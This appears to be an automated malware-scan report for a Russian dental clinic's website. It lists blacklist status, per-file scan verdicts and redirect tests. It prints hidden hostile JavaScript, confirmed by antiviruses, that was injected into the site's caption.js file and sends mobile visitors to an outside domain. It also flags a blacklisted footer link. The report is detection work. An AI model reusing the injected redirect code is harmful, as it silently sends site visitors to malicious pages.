Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dentalcenter-nn.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://dentalcenter-nn.ru/ | 200 OK Content-Length: 35554 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: vtope-nn.ru ...[3493 bytes skipped]... r/> </div> </div> </div></div></section> <footer id="footer" class="grid-block"> <a id="totop-scroller" href="#page"></a> <div class="module deepest"> <p>Создание и пÑодвижение ÑайÑа © 2013 spclab.ru</p> </div><a href="http://vtope-nn.ru/">vtope-nn.ru</a> <!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click' "+ "target=_blank><img src='//counter.yadro.ru/hit?t14.6;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt=' ...[499 bytes skipped]... | ||
http://dentalcenter-nn.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/media/system/js/caption.js | 200 OK Content-Length: 961 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location="http://mobilemaster.pm/l6/?sub_id=284&dd_id=0"; }
var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!= ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}}); Antivirus reports:
| ||
http://dentalcenter-nn.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94194 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/cache/widgetkit/widgetkit-2aedd26d.js | 200 OK Content-Length: 19919 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/templates/yoo_micasa/warp/js/warp.js | 200 OK Content-Length: 8807 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/templates/yoo_micasa/warp/js/responsive.js | 200 OK Content-Length: 3194 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/templates/yoo_micasa/warp/js/accordionmenu.js | 200 OK Content-Length: 1617 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/templates/yoo_micasa/warp/js/dropdownmenu.js | 200 OK Content-Length: 6193 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/templates/yoo_micasa/js/template.js | 200 OK Content-Length: 3155 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/templates/yoo_micasa/warp/js/search.js | 200 OK Content-Length: 4285 Content-Type: application/javascript | clean |
http://dentalcenter-nn.ru/index.php/contakt | 200 OK Content-Length: 23797 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: vtope-nn.ru ...[3395 bytes skipped]... </div> <!-- main end --> <footer id="footer" class="grid-block"> <a id="totop-scroller" href="#page"></a> <div class="module deepest"> <p>Создание и пÑодвижение ÑайÑа © 2013 spclab.ru</p> </div><a href="http://vtope-nn.ru/">vtope-nn.ru</a> <!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click' "+ "target=_blank><img src='//counter.yadro.ru/hit?t14.6;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt=' ...[499 bytes skipped]... | ||
http://dentalcenter-nn.ru//api-maps.yandex.ru/services/constructor/1.0/js/?sid=OFk96T2pjQ8O0Rrjs3LobVHUBQrRXA1-&width=680&height=450/ | HTTP/1.1 404 Not Found Connection: close Date: Fri, 16 Jan 2015 04:47:10 GMT Server: nginx/1.6.0 Content-Length: 155 Content-Type: text/html; charset=iso-8859-1 | clean |
http://handler.hostland.ru/404.html?errorurl= | 200 OK Content-Length: 10803 Content-Type: text/html | clean |
http://handler.hostland.ru/test404page.js | 200 OK Content-Length: 504 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dentalcenter-nn.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 16 Jan 2015 04:47:06 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 8bd62027a485e98b50e8bd5f388ddcaf=42cb6c1dea81c425062541f9d4778b03; path=/
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: dentalcenter-nn.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 16 Jan 2015 04:47:06 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 8bd62027a485e98b50e8bd5f388ddcaf=42cb6c1dea81c425062541f9d4778b03; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: dentalcenter-nn.ru
Referer: http://www.google.com/search?q=dentalcenter-nn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dentalcenter-nn.ru
Referer: http://www.google.com/search?q=dentalcenter-nn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.